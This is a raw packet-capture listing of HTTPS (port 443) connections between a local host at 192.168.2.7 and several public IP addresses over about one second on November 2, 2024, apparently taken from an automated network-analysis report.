Nov 2, 2024 17:56:48.653917074 CET	49890	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.654175997 CET	49890	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.654195070 CET	443	49890	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.654205084 CET	49890	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.654211044 CET	443	49890	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.658864021 CET	49897	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.658910036 CET	443	49897	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.659086943 CET	49897	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.659231901 CET	49897	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.659245968 CET	443	49897	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.681737900 CET	443	49891	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.681890011 CET	443	49891	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.681967974 CET	49891	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.682224989 CET	49891	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.682243109 CET	443	49891	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.682254076 CET	49891	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.682260036 CET	443	49891	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.684639931 CET	49898	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.684670925 CET	443	49898	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.684932947 CET	49898	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.685096979 CET	49898	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.685110092 CET	443	49898	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.695183992 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:48.695210934 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:48.695274115 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:48.695290089 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:48.695343971 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:48.696319103 CET	443	49892	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.696399927 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:48.696418047 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:48.696459055 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:48.696464062 CET	443	49892	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.696469069 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:48.696523905 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:48.696530104 CET	49892	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.697123051 CET	49892	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.697138071 CET	443	49892	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.697148085 CET	49892	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.697154999 CET	443	49892	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.701381922 CET	49899	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.701422930 CET	443	49899	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.701508045 CET	49899	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.702907085 CET	49899	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.702923059 CET	443	49899	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.732592106 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.732618093 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.732625961 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.732680082 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:48.732688904 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.732698917 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.732706070 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.732723951 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:48.732729912 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.732745886 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:48.732749939 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.732785940 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:48.734631062 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.734638929 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.734675884 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.734683990 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.734688044 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:48.734703064 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.734713078 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.734721899 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:48.734747887 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:48.817567110 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:48.817590952 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:48.817640066 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:48.817668915 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:48.817696095 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:48.817722082 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:48.818794966 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:48.818810940 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:48.818876028 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:48.818892956 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:48.818945885 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:48.851867914 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.851880074 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.851918936 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.851929903 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:48.851946115 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.851963043 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:48.851968050 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.852005005 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:48.853096962 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.853113890 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.853161097 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:48.853168011 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.853202105 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:48.879266977 CET	443	49893	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.879487991 CET	49893	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:48.879504919 CET	443	49893	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.879868984 CET	443	49893	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.879928112 CET	49893	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:48.880597115 CET	443	49893	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.880642891 CET	49893	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:48.880898952 CET	49893	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:48.880959034 CET	443	49893	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.881041050 CET	49893	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:48.881047964 CET	443	49893	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.881062984 CET	49893	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:48.927340984 CET	443	49893	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.941282988 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:48.941308022 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:48.941384077 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:48.941411972 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:48.941452026 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:48.970810890 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.970834017 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.970873117 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:48.970901012 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.970918894 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:48.970943928 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:48.972441912 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.972456932 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.972502947 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:48.972511053 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.972572088 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:48.981789112 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:48.981806040 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:48.981868982 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:48.981908083 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:48.981955051 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.015347004 CET	49893	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.052949905 CET	443	49893	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.063910961 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.063946962 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.063994884 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.064003944 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.064032078 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.064050913 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.064980030 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.065004110 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.065066099 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.065073967 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.065125942 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.089858055 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.089880943 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.089936018 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.089946985 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.089989901 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.090600014 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.090617895 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.090670109 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.090676069 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.090718031 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.091658115 CET	443	49893	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.091707945 CET	49893	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.091825962 CET	49893	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.091847897 CET	443	49893	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.170428038 CET	443	49894	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.171331882 CET	49894	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.171345949 CET	443	49894	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.171672106 CET	443	49894	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.174144983 CET	49894	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.174206972 CET	443	49894	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.174485922 CET	49894	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.175508022 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.175537109 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.175592899 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.175622940 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.175649881 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.175674915 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.187247992 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.187264919 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.187335014 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.187350988 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.187392950 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.208492994 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.208517075 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.208561897 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.208579063 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.208619118 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.208935976 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.209511042 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.209525108 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.209592104 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.209597111 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.209645033 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.218380928 CET	49894	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.218391895 CET	443	49894	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.274032116 CET	443	49895	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.297612906 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.297630072 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.297722101 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.297760010 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.297827005 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.309058905 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.309076071 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.309164047 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.309178114 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.309217930 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.309729099 CET	49895	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.309746027 CET	443	49895	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.310532093 CET	49895	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.310538054 CET	443	49895	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.325407982 CET	443	49860	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:49.325439930 CET	443	49860	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:49.325459957 CET	443	49860	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:49.325546980 CET	49860	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:49.325568914 CET	443	49860	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:49.325613976 CET	49860	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:49.325619936 CET	443	49860	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:49.325642109 CET	443	49860	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:49.325655937 CET	49860	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:49.325684071 CET	49860	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:49.326204062 CET	49860	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:49.326220036 CET	443	49860	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:49.326231956 CET	49860	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:49.326237917 CET	443	49860	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:49.328425884 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.328450918 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.328501940 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.328526020 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.328541994 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.328569889 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.329169035 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.329185009 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.329250097 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.329256058 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.329298019 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.329334021 CET	443	49896	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.330446959 CET	49896	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.330466032 CET	443	49896	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.331051111 CET	49896	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.331058025 CET	443	49896	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.349544048 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.349562883 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.349608898 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.349642992 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.349656105 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.349684000 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.389727116 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.389760971 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.389806032 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.389836073 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.389854908 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.389940977 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.397480011 CET	443	49897	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.397905111 CET	49897	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.397957087 CET	443	49897	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.398405075 CET	49897	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.398411989 CET	443	49897	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.415635109 CET	443	49894	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.415661097 CET	443	49894	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.415668964 CET	443	49894	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.415689945 CET	443	49894	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.415710926 CET	443	49894	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.415822983 CET	49894	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.415842056 CET	443	49894	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.415942907 CET	49894	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.425679922 CET	443	49898	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.426675081 CET	49898	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.426697016 CET	443	49898	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.427339077 CET	49898	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.427347898 CET	443	49898	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.431287050 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.431325912 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.431365967 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.431401014 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.431416035 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.431554079 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.432456017 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.432473898 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.432549000 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.432557106 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.432596922 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.437550068 CET	443	49895	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.437582016 CET	443	49895	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.437623024 CET	443	49895	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.437638044 CET	49895	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.437671900 CET	49895	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.438869953 CET	49895	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.438889980 CET	443	49895	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.438899994 CET	49895	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.438905954 CET	443	49895	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.442140102 CET	49903	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.442178011 CET	443	49903	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.442269087 CET	49903	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.442414045 CET	49903	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.442426920 CET	443	49903	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.442722082 CET	443	49899	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.443269968 CET	49899	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.443293095 CET	443	49899	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.443789959 CET	49899	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.443794966 CET	443	49899	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.447115898 CET	443	49894	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.447138071 CET	443	49894	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.447177887 CET	49894	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.447190046 CET	443	49894	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.447233915 CET	49894	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.447235107 CET	49894	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.448090076 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.448117971 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.448177099 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.448194027 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.448223114 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.448230982 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.448935986 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.448956013 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.448987007 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.448991060 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.449022055 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.449038982 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.465229034 CET	443	49896	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.465313911 CET	443	49896	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.465414047 CET	49896	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.465435982 CET	49896	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.465449095 CET	443	49896	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.465477943 CET	49896	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.465482950 CET	443	49896	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.468457937 CET	49904	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.468497992 CET	443	49904	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.468590975 CET	49904	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.468806982 CET	49904	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.468825102 CET	443	49904	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.485446930 CET	49905	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:49.485491991 CET	443	49905	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:49.485591888 CET	49905	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:49.485867023 CET	49905	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:49.485877037 CET	443	49905	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:49.528805017 CET	443	49897	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.528868914 CET	443	49897	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.529004097 CET	49897	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.529266119 CET	49897	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.529289007 CET	443	49897	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.529299974 CET	49897	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.529305935 CET	443	49897	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.532847881 CET	49908	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.532885075 CET	443	49908	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.532963037 CET	49908	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.533118963 CET	49908	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.533137083 CET	443	49908	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.543380022 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.543421030 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.543463945 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.543494940 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.543517113 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.543539047 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.554363966 CET	443	49886	13.107.246.57	192.168.2.7
